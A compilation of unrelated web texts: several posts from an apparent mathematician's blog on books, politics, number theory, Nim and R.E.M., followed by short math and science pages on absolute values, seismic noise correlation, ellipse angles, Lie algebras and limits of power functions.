## Jay Michaelson on God vs. Gay, Dec 1 My friend Jay Michaelson, my go-to guy for all matters of Jewish learning, is speaking in Madison this Thursday evening about his new book God vs. Gay?: The Religious Case for Equality. Recommended for all who care what feisty left-wing observant Jews have to say about religion and sex. Which is everyone, right? Book trailer: ## Why do people think government workers are stupid? From Michael Lewis’s The Big Short: “You know how when you walk into a post office you realize there is such a difference between a government employee and other people,” said Vinny. “The ratings agency people were all like government employees.” Collectively they had more power than anyone in the bond markets, but individually they were nobodies. “They’re underpaid,” said Eisman. “The smartest ones leave for Wall Street firms so they can help manipulate the companies they used to work for.” Where does it come from, this idea that people whose employer is the city, state, or nation are made of inferior stuff? What is the “difference” Vinny perceives between the person helping him at the post office and the teller at his bank? Does he really get worse service at the DMV than he gets from United Airlines? Does he not have cable? ## The Arrow-Debreu model wishes you a happy Thanksgiving I keep going to talks that raise the question: what is an equilibrium, in the sense of economics? Not “what is the mathematical definition,” but “what is it, really?” (The Big Short is relevant here too.) I don’t have any thoughts of my own articulate enough for the blog, but in the spirit of the holiday I should certainly link to Cosma Shalizi’s explanation of why conceptual art is the most economically efficient use of a dead turkey. Gobble gobble.
## Math Girls The holiday season approaches and surely you are looking for a new translation of a bestselling young adult novel from Japan which is half adolescent love story and half elementary number theory text. You’re in luck. Bento Books sent me a review copy of the book, Math Girls by Hiroshi Yuki (tr. Tony Gonzalez) and by the second chapter the narrative has already addressed not only the fact that 1 is not prime, but the fact that it’s entirely in our hands whether to define 1 to be a prime or not, and why we made the choice we did. How romantic! Sample chapters here. ## Are math departments better at recruitment than elite financial firms? Via Bryan Caplan, Lauren Rivera at Northwestern studied hiring practices at top financial, law, and consulting firms and found some surprises: [E]valuators drew strong distinctions between top four universities, schools that I term the super-elite, and other types of selective colleges and universities. So-called “public Ivies” such as University of Michigan and Berkeley were not considered elite or even prestigious… In addition to being an indicator of potential intellectual deficits, the decision to go to a lesser known school (because it was typically perceived by evaluators as a “choice”) was often perceived to be evidence of moral failings, such as faulty judgment or a lack of foresight on the part of a student. I’m not sure what those four schools are, but they exclude some pretty good undergraduates: You will find it when you go to like career fairs or something and you know someone will show up and say, you know, “Hey, I didn’t go to HBS [Harvard Business School] but, you know, I am an engineer at M.I.T. and I heard about this fair and I wanted to come meet you in New York.” God bless him for the effort but, you know, it’s just not going to work.
And don’t neglect those extracurriculars: [E]valuators believed that the most attractive and enjoyable coworkers and candidates would be those who had strong extracurricular “passions.” They also believed that involvement in activities outside of the classroom was evidence of superior social skill; they assumed a lack of involvement was a signal of social deficiencies… By contrast, those without significant extracurricular experiences or those who participated in activities that were primarily academically or pre-professionally oriented were perceived to be “boring,” “tools,” “bookworms,” or “nerds” who might turn out to be “corporate drones” if hired. All this stuff sounds bizarre to people outside the world of corporate recruitment.  And it is natural for academics like me to read this and silently congratulate myself on our superior methods of judgment.  But surely there are things about our process which would seem just as irrational and counterproductive to people outside of academic mathematics.  What are they? It might make more sense to concentrate on graduate recruitment as against tenure-track hiring, since then both we and the financiers are talking about recent BAs with little track record in the workplace. (Linguistic note:  “Counterproductive” is surely a word that people would deride as horrible managementese if it weren’t already in common use.  But it’s a great word!) (Upcoming blog note: At some point soon I’ll blog about Michael Lewis’s The Big Short, which I just finished, and which is the reason the credentials of financial professionals are on my mind.) ## Scott Walker: not toast Much was made of the WPR/St. Norbert poll released last week, in which 58% of respondents said they’d vote for Scott Walker’s opponent if a recall comes to pass, with only 38% saying they’d vote to keep the Governor in office.  
Worth noting the numbers below the top line, though:  in the sample of 482 voters, 34% reported voting for JoAnne Kloppenburg in April’s Supreme Court election, against 27% who said they voted for Prosser.  In fact, those votes were evenly split.  So it’s way, way, way too soon to say that Walker’s behind in a potential recall election, especially with Wisconsin D’s still in search of a candidate. (Another interesting result from that poll:  people in Wisconsin apparently really like electing their Supreme Court, and in fact would prefer that the prospective justice’s party affiliation be listed on the ballot!) ## Gonality, the Bogomolov property, and Habegger’s theorem on Q(E^tors) I promised to say a little more about why I think the result of Habegger’s recent paper, ” Small Height and Infinite Non-Abelian Extensions,” is so cool. First of all:  we say an algebraic extension K of Q has the Bogomolov property if there is no infinite sequence of non-torsion elements x in K^* whose absolute logarithmic height tends to 0.  Equivalently, 0 is isolated in the set of absolute heights in K^*.  Finite extensions of Q evidently have the Bogomolov property (henceforth:  (B)) but for infinite extensions the question is much subtler.  Certainly $\bar{\mathbf{Q}}$ itself doesn’t have (B):  consider the sequence $2^{1/2}, 2^{1/3}, 2^{1/4}, \ldots$  On the other hand, the maximal abelian extension of Q is known to have (B) (Amoroso-Dvornicich) , as is any extension which is totally split at some fixed place p (Schinzel for the real prime, Bombieri-Zannier for the other primes.) Habegger has proved that, when E is an elliptic curve over Q, the field Q(E^tors) obtained by adjoining all torsion points of E has the Bogomolov property. What does this have to do with gonality, and with my paper with Chris Hall and Emmanuel Kowalski from last year? Suppose we ask about the Bogomolov property for extensions of a more general field F?  
Well, F had better admit a notion of absolute Weil height. This is certainly OK when F is a global field, like the function field of a curve over a finite field k; but in fact it’s fine for the function field of a complex curve as well. So let’s take that view; in fact, for simplicity, let’s take F to be C(t). What does it mean for an algebraic extension F’ of F to have the Bogomolov property? It means that there is a constant c such that, for every finite subextension L of F’ and every non-constant function x in L^*, the absolute logarithmic height of x is at least c. Now L is the function field of some complex algebraic curve C, a finite cover of P^1. And a non-constant function x in L^* can be thought of as a nonzero principal divisor. The logarithmic height, in this context, is just the number of zeroes of x — or, if you like, the number of poles of x — or, if you like, the degree of x, thought of as a morphism from C to the projective line. (Not necessarily the projective line of which C is a cover — a new projective line!) In the number field context, it was pretty easy to see that the log height of non-torsion elements of L^* was bounded away from 0. That’s true here, too, even more easily — a non-constant map from C to P^1 has degree at least 1! There’s one convenient difference between the geometric case and the number field case. The lowest log height of a non-torsion element of L^* — that is, the least degree of a non-constant map from C to P^1 — already has a name. It’s called the gonality of C. For the Bogomolov property, the relevant number isn’t the log height, but the absolute log height, which is to say the gonality divided by [L:F]. So the Bogomolov property for F’ — what we might call the geometric Bogomolov property — says the following. We think of F’ as a family of finite covers C / P^1. Then (GB) There is a constant c such that the gonality of C is at least c deg(C/P^1), for every cover C in the family.
What kinds of families of covers are geometrically Bogomolov?  As in the number field case, you can certainly find some families that fail the test — for instance, gonality is bounded above in terms of genus, so any family of curves C with growing degree over P^1 but bounded genus will do the trick. On the other hand, the family of modular curves over X(1) is geometrically Bogomolov; this was proved (independently) by Abramovich and Zograf.  This is a gigantic and elegant generalization of Ogg’s old theorem that only finitely many modular curves are hyperelliptic (i.e. only finitely many have gonality 2.) At this point we have actually more or less proved the geometric version of Habegger’s theorem!  Here’s the idea.  Take F = C(t) and let E/F be an elliptic curve; then to prove that F(E(torsion)) has (GB), we need to give a lower bound for the curve C_N obtained by adjoining an N-torsion point to F.  (I am slightly punting on the issue of being careful about other fields contained in F(E(torsion)), but I don’t think this matters.)  But C_N admits a dominant map to X_1(N); gonality goes down in dominant maps, so the Abramovich-Zograf bound on the gonality of X_1(N) provides a lower bound for the gonality of C_N, and it turns out that this gives exactly the bound required. What Chris, Emmanuel and I proved is that (GB) is true in much greater generality — in fact (using recent results of Golsefidy and Varju that slightly postdate our paper) it holds for any extension of C(t) whose Galois group is a perfect Lie group with Z_p or Zhat coefficients and which is ramified at finitely many places; not just the extension obtained by adjoining torsion of an elliptic curve, for instance, but the one you get from the torsion of an abelian variety of arbitrary dimension, or for that matter any other motive with sufficiently interesting Mumford-Tate group. Question:   Is Habegger’s theorem true in this generality?  
For instance, if A/Q is an abelian variety, does Q(A(tors)) have the Bogomolov property? Question:  Is there any invariant of a number field which plays the role in the arithmetic setting that “spectral gap of the Laplacian” plays for a complex algebraic curve? A word about Habegger’s proof.  We know that number fields are a lot more like F_q(t) than they are like C(t).  And the analogue of the Abramovich-Zograf bound for modular curves over F_q is known as well, by a theorem of Poonen.  The argument is not at all like that of Abramovich and Zograf, which rests on analysis in the end.  Rather, Poonen observes that modular curves in characteristic p have lots of supersingular points, because the square of Frobenius acts as a scalar on the l-torsion in the supersingular case.  But having a lot of points gives you a lower bound on gonality!  A curve with a degree d map to P^1 has at most d(q+1) points, just because the preimage of each of the q+1 points of P^1(q) has size at most d.  (You just never get too old or too sophisticated to whip out the Pigeonhole Principle at an opportune moment….) Now I haven’t studied Habegger’s argument in detail yet, but look what you find right in the introduction: The non-Archimedean estimate is done at places above an auxiliary prime number p where E has good supersingular reduction and where some other technical conditions are met…. In this case we will obtain an explicit height lower bound swiftly using the product formula, cf. Lemma 5.1. The crucial point is that supersingularity forces the square of the Frobenius to act as a scalar on the reduction of E modulo p. Yup!  There’s no mention of Poonen in the paper, so I think Habegger came to this idea independently.  Very satisfying!  The hard case — for Habegger as for Poonen — has to do with the fields obtained by adjoining p-torsion, where p is the characteristic of the supersingular elliptic curve driving the argument.  
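The pigeonhole step in Poonen's argument can be written out explicitly. Here is a sketch of the standard bound, under the simplifying assumption that the degree-$d$ map realizing the gonality is itself defined over $\mathbf{F}_q$:

```latex
% A degree-d map \varphi : C \to \mathbf{P}^1 over \mathbf{F}_q sends each
% \mathbf{F}_q-point of C to one of the q+1 points of \mathbf{P}^1(\mathbf{F}_q),
% and at most d points of C lie above each of them, so
\# C(\mathbf{F}_q) \;\le\; d \cdot \# \mathbf{P}^1(\mathbf{F}_q) \;=\; d\,(q+1),
\qquad \text{hence} \qquad
\mathrm{gon}(C) \;\ge\; \frac{\# C(\mathbf{F}_q)}{q+1}.
```

So any family of curves with many rational points relative to $q$ — such as modular curves in characteristic $p$, with their abundance of supersingular points — has gonality growing at least linearly in the point count.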
It would be very interesting to hear from Poonen and/or Habegger whether the arguments are similar in that case too! ## Help me be a great Nim teacher I’ll be at Marvelous Math Morning at CJ’s school this Saturday, playing Nim with kids ranging from K-5. One simple goal is to teach them the winning strategy for the version of the game where there’s one pile and each player can draw 1 or 2 chips. I’ve done that with CJ and he really liked it — and I think the idea of a perfect strategy is one of those truly deep mathematical concepts that even little kids can grasp. But what else should I do? What other Nims and Nimlikes should I teach these kids and what lessons should I try to impart thereby? Update: First two commenters both mentioned Tic-Tac-Toe. At what age do kids typically learn how to play Tic-Tac-Toe and at what age have they learned a perfect strategy? CJ is in kindergarten and has not seen this, or at least he hasn’t seen it from me. I’ll ask him tonight. Update: Nim a success! I played mostly one-pile, and the kids were definitely able to grasp pretty quickly the idea of winning and losing positions, and the goal of chasing the former and avoiding the latter. I didn’t encounter anyone who’d played nim before. I felt some math was transmitted. Mission accomplished. ## R.E.M. and Cal Ripken Dave Daley delivers a great, frank interview with Michael Stipe on R.E.M.’s breakup. I would rather throw myself off a cliff or be boiled in lead than listen to “Life’s Rich Pageant” demos – [and here Stipe groan sings unintelligible syllables as if he is in pain] — my doing this horrible moaning over a song that then became a beautiful song. Peter and Mike love that stuff. Somehow I have managed not to write anything in this space about the end of my very favorite rock band. The post I was going to write was about R.E.M.
and Cal Ripken — both of whom were, from start to finish, so recognizably themselves as to be a pleasure to watch, even with half their power gone. Both of them announced a new way to play their position, and neither would ever be mistaken for the imitators they made possible. (I like to think that Derek Jeter is Live in this scenario, but really only because I hate both so very much.) I guess the way that Stipe doesn’t sound like a great singer, but is one, matches the way that Ripken didn’t look like a great fielder, but was one. Where were the dives, where were the behind-the-back flips? No need — Ripken was just always standing where the ball was going to be. And Stipe was always singing what the song wanted him to sing, whether or not you could make well-defined words, or even well-defined notes, out of it. Murmur and Ripken’s first MVP season were surely the two best things about 1983 — though Pete Thorn, decades ago, was saying that Ripken’s astounding defense in 1984 made that an even better season — a suggestion that was ignored at the time, but WAR agrees. Maybe Pete Thorn is the analogue of the diehards who think Fables is better than Murmur. (Except Thorn was probably right.) People who love Automatic for the People would no doubt call that record the analogue of Ripken’s out-of-nowhere MVP year in 1991 — not me, though. And R.E.M. never really did anything that matches the lonely beauty of a half-season that Ripken turned in in 1999, at the age of 38, for a team going nowhere — in fact, a team that, once Ripken left, would spend most of a decade going nowhere, and the rest of the time actually being nowhere. Most days I think “Pilgrimage” is the greatest song they ever made: though at the time I might have preferred “It’s The End of the World As We Know It (and I feel fine),” whose lyrics I resolutely memorized, and on behalf of which I launched a doomed campaign for my high school’s 1989 prom theme.
It would have been a really great prom theme.
https://socratic.org/questions/how-can-an-absolute-value-equation-have-no-solution
# How can an absolute value equation have no solution? The absolute value of a real number is never negative, so an equation $| x | = c$ has no solution whenever $c < 0$. For example, $| x | = - 1$ has no solution, since there is no real number whose absolute value equals $-1$.
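The case analysis behind this answer is easy to make concrete. A tiny sketch (the helper name `solve_abs_eq` is made up for illustration), solving $|x| = c$ over the reals:

```python
def solve_abs_eq(c):
    """Return the set of real solutions of |x| = c."""
    if c < 0:
        return set()        # |x| >= 0 for every real x, so no solution exists
    if c == 0:
        return {0}          # only x = 0 has absolute value 0
    return {c, -c}          # two symmetric solutions when c > 0

# |x| = -1 has no solution, while |x| = 3 has exactly two: x = 3 and x = -3.
assert solve_abs_eq(-1) == set()
assert solve_abs_eq(3) == {3, -3}
```

The empty set returned for negative right-hand sides is exactly the "no solution" case discussed above.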
http://geophydog.cool/post/ccf_noise_source/
Impulse responses (empirical Green's functions), if the wave field is diffuse, can be retrieved from the interstation cross-correlation of ambient noise. However, the cross-correlation time functions are asymmetric if the noise sources are distributed unevenly. Here we give an example showing how the cross-correlation functions vary with the azimuths of the noise sources (red dots). We computed synthetic seismograms of earthquakes at azimuths from 1 to 360 degrees with an interval of 1 degree, recorded by two receivers (blue triangles); we then computed the cross-correlation time functions and aligned them by azimuth; lastly, we stacked all the cross-correlations to show that the stack is symmetric when the noise sources are distributed evenly.
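The symmetry of the stack can be sketched numerically. This is a minimal pure-Python model, not the synthetic-seismogram computation described above: two hypothetical receivers on a line, impulsive sources evenly spaced in azimuth on a surrounding circle, a homogeneous medium with unit wave speed, and the correlation of each source reduced to the lag of its peak (the differential travel time):

```python
import math

def lag_for_source(angle_deg, r=10.0, c=1.0, rx1=(-1.0, 0.0), rx2=(1.0, 0.0)):
    """Differential travel time (lag of the correlation peak) for one
    impulsive source at the given azimuth on a circle of radius r."""
    sx = r * math.cos(math.radians(angle_deg))
    sy = r * math.sin(math.radians(angle_deg))
    d1 = math.hypot(sx - rx1[0], sy - rx1[1])   # distance to receiver 1
    d2 = math.hypot(sx - rx2[0], sy - rx2[1])   # distance to receiver 2
    return (d2 - d1) / c

# Sources evenly distributed in azimuth: the stacked lag distribution is
# symmetric about zero lag, i.e. the stacked cross-correlation is two-sided.
lags = [lag_for_source(a) for a in range(360)]
assert abs(sum(lags)) < 1e-9              # positive and negative lags cancel
assert abs(max(lags) + min(lags)) < 1e-9  # extremes are mirror images
```

A source at azimuth θ and its mirror at 180° − θ swap the two travel distances, so their lags are negatives of each other; with even azimuthal coverage every lag is paired this way, which is the symmetry the stacked cross-correlation exhibits.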
http://petercollingridge.co.uk/tutorials/computational-geometry/finding-angle-around-ellipse/
Finding the angle around an ellipse Jan. 29, 2014 When is the angle around an ellipse not the angle around the ellipse? This is a problem which tripped me up a few times when working with elliptical orbits and arcs. The problem This problem arises when we use a parametric equation for an ellipse, defining the point on an ellipse as a function of $\theta$ with these two equations. $x = a \cdot \cos(\theta) \\ y = b \cdot \sin(\theta)$ Where $a$ is the length of the semi-axis aligned with the x-axis and $b$ is the length of the semi-axis aligned with the y-axis (I'm assuming the ellipse is oriented so that its axes are aligned with the coordinate axes). The mistake The temptation is to assume that $\theta$ represents the angle around the ellipse, which it does if your ellipse is a circle, or when $\theta \in \{0, \frac{\pi}{2}, \pi, \frac{3\pi}{2}\}$. However, in most circumstances $\theta$ does not represent an angle. The question then is how to find the angle $\phi$ around the ellipse to the point (x, y). The solution The hardest part of the problem is to realise that there is a problem. After that, it's basic trigonometry to find the solution. \qquad\begin{align} \tan(\phi) &= \frac{y}{x} \\ \tan(\phi) &= \frac{b \cdot \sin(\theta)}{a \cdot \cos(\theta)} \\ \tan(\phi) &= \frac{b}{a} \cdot \tan(\theta) \\ \phi &= \operatorname{atan} \left(\frac{b}{a} \cdot \tan(\theta)\right) \end{align} Likewise, you can calculate the inverse with: $\qquad\theta = \operatorname{atan} \left(\frac{a}{b} \cdot \tan(\phi)\right)$ This is particularly useful for generating arcs in Processing.js where $\theta$ is used in the calculation for the angles to start and stop. If you want to find a point on the ellipse which aligns with another point (px, py) and the origin (say placing a planet on an elliptic orbit based on a mouse click), it's even easier.
$\qquad\theta = \operatorname{atan} \left(\frac{a \cdot py}{b \cdot px} \right)$ The hardest part of all this was realising that the parametric "angle" I was using to define an elliptic arc was not the angle I expected, or really any sort of angle at all. Philip on Jan. 23, 2018, 11:07 p.m. Hi! Thanks for the hint :)) I spent 30 minutes trying to understand why, using the theta angle, I couldn't find the right dot on the ellipse; I knew I was doing something wrong, and after googling I immediately found your post and solved the problem. Thank you for sharing this on your blog! Wade on May 16, 2018, 8:16 p.m. Can this help to impose the initial nodal points so that there is equal arclength between two points on the ellipse? If yes, then given the arclength, how do we compute the corresponding angle?
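The relationship derived above is easy to check numerically. A short Python sketch (the `a`, `b`, and `theta` values are arbitrary; `atan2` is used rather than plain `atan` so all four quadrants are handled):

```python
import math

def point_on_ellipse(a, b, theta):
    """Parametric point on the ellipse: theta is the parameter, NOT the polar angle."""
    return a * math.cos(theta), b * math.sin(theta)

def polar_angle_from_parameter(a, b, theta):
    """Actual angle phi from the origin to the point with parameter theta."""
    x, y = point_on_ellipse(a, b, theta)
    return math.atan2(y, x)   # atan2 avoids the quadrant ambiguity of atan

a, b = 4.0, 1.0
theta = math.pi / 3
phi = polar_angle_from_parameter(a, b, theta)

# In the first quadrant, phi == atan((b/a) * tan(theta)), and phi != theta
# unless the ellipse is a circle.
assert math.isclose(phi, math.atan((b / a) * math.tan(theta)))
assert not math.isclose(phi, theta)
```

For a circle (`a == b`) the two angles coincide, which is exactly why the mistake is so easy to make when prototyping with circles first.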
http://www.ncatlab.org/nlab/show/LieAlg
## Definition The category $Lie Alg$ is the category whose objects are Lie algebras $(\mathfrak{g}, [-,-]_{\mathfrak{g}})$ and whose morphisms are Lie algebra homomorphisms, that is, linear maps $\phi\colon \mathfrak{g} \to \mathfrak{h}$ such that for all $x,y \in \mathfrak{g}$ we have $\phi( [x,y]_{\mathfrak{g}}) = [\phi(x),\phi(y)]_\mathfrak{h} \,.$ If Lie algebras are expressed in terms of their Chevalley–Eilenberg algebras (and if restricted to finite-dimensional Lie algebras), this may equivalently be characterized as follows: $Lie Alg$ is the full subcategory of the opposite category of the category dgAlg of dg-algebras on those dg-algebras whose underlying graded algebra is a Grassmann algebra, i.e. of the form $\wedge^\bullet \mathfrak{g}$. Revised on October 24, 2012 02:18:45 by Toby Bartels
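As a concrete sanity check of the homomorphism condition, here is a hand-rolled numerical sketch (my example, not from the nLab page): $\mathbb{R}^3$ with the cross product is a Lie algebra, and any rotation $A \in SO(3)$ gives a Lie algebra homomorphism, since $A(x \times y) = Ax \times Ay$ for rotations:

```python
def cross(u, v):
    """Lie bracket on R^3: the cross product."""
    return [u[1]*v[2] - u[2]*v[1],
            u[2]*v[0] - u[0]*v[2],
            u[0]*v[1] - u[1]*v[0]]

def apply(A, v):
    """Matrix-vector product."""
    return [sum(A[i][j] * v[j] for j in range(3)) for i in range(3)]

# Rotation by 90 degrees about the z-axis (an element of SO(3)).
A = [[0.0, -1.0, 0.0],
     [1.0,  0.0, 0.0],
     [0.0,  0.0, 1.0]]

x, y = [1.0, 2.0, 3.0], [-2.0, 0.5, 4.0]
# phi([x, y]) == [phi(x), phi(y)]: the defining property of a morphism in Lie Alg
assert apply(A, cross(x, y)) == cross(apply(A, x), apply(A, y))
```

A generic linear map would fail this check; preserving the bracket is precisely what singles out the morphisms of $Lie Alg$ among all linear maps.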
https://activecalculus.org/prelude/sec-poly-infty.html
## Section5.1Infinity, limits, and power functions In Section 3.2, we compared the behavior of the exponential functions $p(t) = 2^t$ and $q(t) = (\frac{1}{2})^t\text{,}$ and observed in Figure 3.2.5 that as $t$ increases without bound, $p(t)$ also increases without bound, while $q(t)$ approaches $0$ (while having its value be always positive). We also introduced shorthand notation for describing these phenomena, writing \begin{equation*} p(t) \to \infty \text{ as } t \to \infty \end{equation*} and \begin{equation*} q(t) \to 0 \text{ as } t \to \infty\text{.} \end{equation*} It's important to remember that infinity is not itself a number. We use the “$\infty$” symbol to represent a quantity that gets larger and larger with no bound on its growth. We also know that the concept of infinity plays a key role in understanding the graphical behavior of functions. For instance, we've seen that for a function such as $F(t) = 72 - 45e^{-0.05t}\text{,}$ $F(t) \to 72$ as $t \to \infty\text{,}$ since $e^{-0.05t} \to 0$ as $t$ increases without bound. The function $F$ can be viewed as modeling the temperature of an object that is initially $F(0) = 72-45 = 27$ degrees that eventually warms to $72$ degrees. The line $y = 72$ is thus a horizontal asymptote of the function $F\text{.}$ In Preview 5.1.1, we review some familiar functions and portions of their behavior that involve $\infty\text{.}$ ###### Preview Activity5.1.1. Complete each of the following statements with an appropriate number or the symbols $\infty$ or $-\infty\text{.}$ Do your best to do so without using a graphing utility; instead use your understanding of the function's graph. 1. As $t \to \infty\text{,}$ $e^{-t} \to$ . 2. As $t \to \infty\text{,}$ $\ln(t) \to$ . 3. As $t \to \infty\text{,}$ $e^{t} \to$ . 4. As $t \to 0^+\text{,}$ $e^{-t} \to$ . (When we write $t \to 0^+\text{,}$ this means that we are letting $t$ get closer and closer to $0\text{,}$ but only allowing $t$ to take on positive values.) 5. 
As $t \to \infty\text{,}$ $35 + 53e^{-0.025t} \to$ . 6. As $t \to \frac{\pi}{2}^-\text{,}$ $\tan(t) \to$ . (When we write $t \to \frac{\pi}{2}^-\text{,}$ this means that we are letting $t$ get closer and closer to $\frac{\pi}{2}\text{,}$ but only allowing $t$ to take on values that lie to the left of $\frac{\pi}{2}\text{.}$) 7. As $t \to \frac{\pi}{2}^+\text{,}$ $\tan(t) \to$ . (When we write $t \to \frac{\pi}{2}^+\text{,}$ this means that we are letting $t$ get closer and closer to $\frac{\pi}{2}\text{,}$ but only allowing $t$ to take on values that lie to the right of $\frac{\pi}{2}\text{.}$) ### Subsection5.1.1Limit notation When observing a pattern in the values of a function that correspond to letting the inputs get closer and closer to a fixed value or letting the inputs increase or decrease without bound, we are often interested in the behavior of the function “in the limit”. In either case, we are considering an infinite collection of inputs that are themselves following a pattern, and we ask the question “how can we expect the function's output to behave if we continue?” For instance, we have regularly observed that “as $t \to \infty\text{,}$ $e^{-t} \to 0\text{,}$” which means that by allowing $t$ to get bigger and bigger without bound, we can make $e^{-t}$ get as close to $0$ as we'd like (without $e^{-t}$ ever equalling $0\text{,}$ since $e^{-t}$ is always positive). Similarly, as seen in Figure 5.1.1 and Figure 5.1.2, we can make such observations as $e^t \to \infty$ as $t \to \infty\text{,}$ $\ln(t) \to \infty$ as $t \to \infty\text{,}$ and $\ln(t) \to -\infty$ as $t \to 0^+\text{.}$ We introduce formal limit notation in order to be able to express these patterns even more succinctly. ###### Definition5.1.3. Let $L$ be a real number and $f$ be a function.
If we can make the value of $f(t)$ as close to $L$ as we want by letting $t$ increase without bound, we write \begin{equation*} \lim_{t \to \infty} f(t) = L \end{equation*} and say that the limit of $f$ as $t$ increases without bound is $L$. If the value of $f(t)$ increases without bound as $t$ increases without bound, we instead write \begin{equation*} \lim_{t \to \infty} f(t) = \infty\text{.} \end{equation*} Finally, if $f$ doesn't increase without bound, doesn't decrease without bound, and doesn't approach a single value $L$ as $t \to \infty\text{,}$ we say that $f$ does not have a limit as $t \to \infty$. We use limit notation in related, natural ways to express patterns we see in function behavior. For instance, we write $t \to -\infty$ when we let $t$ decrease without bound, and $f(t) \to -\infty$ if $f$ decreases without bound. We can also think about an input value $t$ approaching a value $a$ at which the function $f$ is not defined. As one example, we write \begin{equation*} \lim_{t \to 0^+} \ln(t) = -\infty \end{equation*} because the natural logarithm function decreases without bound as input values get closer and closer to $0$ (while always being positive), as seen in Figure 5.1.2. In the situation where $\lim_{t \to \infty} f(t) = L\text{,}$ this tells us that $f$ has a horizontal asymptote at $y = L$ since the function's value approaches this fixed number as $t$ increases without bound. Similarly, if we can say that $\lim_{t \to a} f(t) = \infty\text{,}$ this shows that $f$ has a vertical asymptote at $x = a$ since the function's value increases without bound as inputs approach the fixed number $a\text{.}$ For now, we are going to focus on the long-range behavior of certain basic, familiar functions and work to understand how they behave as the input increases or decreases without bound. We've used the input variable $t$ in most of our previous work; going forward, we'll regularly use $x$ as well. ###### Activity5.1.2.
Complete the Table 5.1.4 by entering “$\infty\text{,}$” “$-\infty\text{,}$” “$0\text{,}$” or “no limit” to identify how the function behaves as either $x$ increases or decreases without bound. As much as possible, work to decide the behavior without using a graphing utility. ### Subsection5.1.2Power functions To date, we have worked with several families of functions: linear functions of form $y = mx + b\text{,}$ quadratic functions in standard form, $y = ax^2 + bx + c\text{,}$ the sinusoidal (trigonometric) functions $y = a\sin(k(x-b))+c$ or $y = a\cos(k(x-b))+c\text{,}$ transformed exponential functions such as $y = ae^{kx} + c\text{,}$ and transformed logarithmic functions of form $y = a\ln(x) + c\text{.}$ For trigonometric, exponential, and logarithmic functions, it was essential that we first understood the behavior of the basic parent functions $\sin(x)\text{,}$ $\cos(x)\text{,}$ $e^x\text{,}$ and $\ln(x)\text{.}$ In order to build on our prior work with linear and quadratic functions, we now consider basic functions such as $x\text{,}$ $x^2\text{,}$ and additional powers of $x\text{.}$ ###### Definition5.1.5. A function of the form $f(x) = x^p$ where $p$ is any real number is called a power function. We first focus on the case where $p$ is a natural number (that is, a positive whole number). ###### Activity5.1.3. Point your browser to the Desmos worksheet at http://gvsu.edu/s/0zu. In what follows, we explore the behavior of power functions of the form $y = x^n$ where $n \ge 1\text{.}$ 1. Press the “play” button next to the slider labeled “$n\text{.}$” Watch at least two loops of the animation and then discuss the trends that you observe. Write a careful sentence each for at least two different trends. 2. Click the icons next to each of the following 8 functions so that you can see all of $y = x\text{,}$ $y = x^2\text{,}$ $\ldots\text{,}$ $y = x^8$ graphed at once. 
On the interval $0 \lt x \lt 1\text{,}$ how do the graphs of $x^a$ and $x^b$ compare if $a \lt b\text{?}$ 3. Uncheck the icons on each of the 8 functions to hide their graphs. Click the settings icon to change the domain settings for the axes, and change them to $-10 \le x \le 10$ and $-10,000 \le y \le 10,000\text{.}$ Play the animation through twice and then discuss the trends that you observe. Write a careful sentence each for at least two different trends. 4. Click the icons next to each of the following 8 functions so that you can see all of $y = x\text{,}$ $y = x^2\text{,}$ $\ldots\text{,}$ $y = x^8$ graphed at once. On the interval $x \gt 1\text{,}$ how do the graphs of $x^a$ and $x^b$ compare if $a \lt b\text{?}$ In the situation where the power $p$ is a negative integer (i.e., a negative whole number), power functions behave very differently. This is because of the property of exponents that states \begin{equation*} x^{-n} = \frac{1}{x^n} \end{equation*} so for a power function such as $p(x) = x^{-2}\text{,}$ we can equivalently consider $p(x) = \frac{1}{x^2}\text{.}$ Note well that for these functions, their domain is the set of all real numbers except $x = 0\text{.}$ Like with power functions with positive whole number powers, we want to know how power functions with negative whole number powers behave as $x$ increases without bound, as well as how the functions behave near $x = 0\text{.}$ ###### Activity5.1.4. Point your browser to the Desmos worksheet at http://gvsu.edu/s/0zv. In what follows, we explore the behavior of power functions $y = x^n$ where $n \le -1\text{.}$ 1. Press the “play” button next to the slider labeled “$n\text{.}$” Watch two loops of the animation and then discuss the trends that you observe. Write a careful sentence each for at least two different trends. 2. Click the icons next to each of the following 8 functions so that you can see all of $y = x^{-1}\text{,}$ $y = x^{-2}\text{,}$ $\ldots\text{,}$ $y = x^{-8}$ graphed at once. 
On the interval $1 \lt x\text{,}$ how do the functions $x^a$ and $x^b$ compare if $a \lt b\text{?}$ (Be careful with negative numbers here: e.g., $-3 \lt -2\text{.}$) 3. How do your answers change on the interval $0 \lt x \lt 1\text{?}$ 4. Uncheck the icons on each of the 8 functions to hide their graphs. Click the settings icon to change the domain settings for the axes, and change them to $-10 \le x \le 10$ and $-10,000 \le y \le 10,000\text{.}$ Play the animation through twice and then discuss the trends that you observe. Write a careful sentence each for at least two different trends. 5. Explain why $\lim_{x \to \infty} \frac{1}{x^n} = 0$ for any choice of $n = 1, 2, \ldots\text{.}$ ### Subsection5.1.3Summary • The notation \begin{equation*} \lim_{x \to \infty} f(x) = L \end{equation*} means that we can make the value of $f(x)$ as close to $L$ as we'd like by letting $x$ be sufficiently large. This indicates that the value of $f$ eventually stops changing much and tends to a single value, and thus $y = L$ is a horizontal asymptote of the function $f\text{.}$ Similarly, the notation \begin{equation*} \lim_{x \to a} f(x) = \infty \end{equation*} means that we can make the value of $f(x)$ as large as we'd like by letting $x$ be sufficiently close, but not equal, to $a\text{.}$ This unbounded behavior of $f$ near a finite value $a$ indicates that $f$ has a vertical asymptote at $x = a\text{.}$ • We summarize some key behavior of familiar basic functions with limits as $x$ increases without bound in Table 5.1.6. Additionally, Table 5.1.7 summarizes some key familiar function behavior where the function's output increases or decreases without bound as $x$ approaches a fixed number not in the function's domain. • A power function is a function of the form $f(x) = x^p$ where $p$ is any real number. For the two cases where $p$ is a positive whole number or a negative whole number, it is straightforward to summarize key trends in power functions' behavior. 
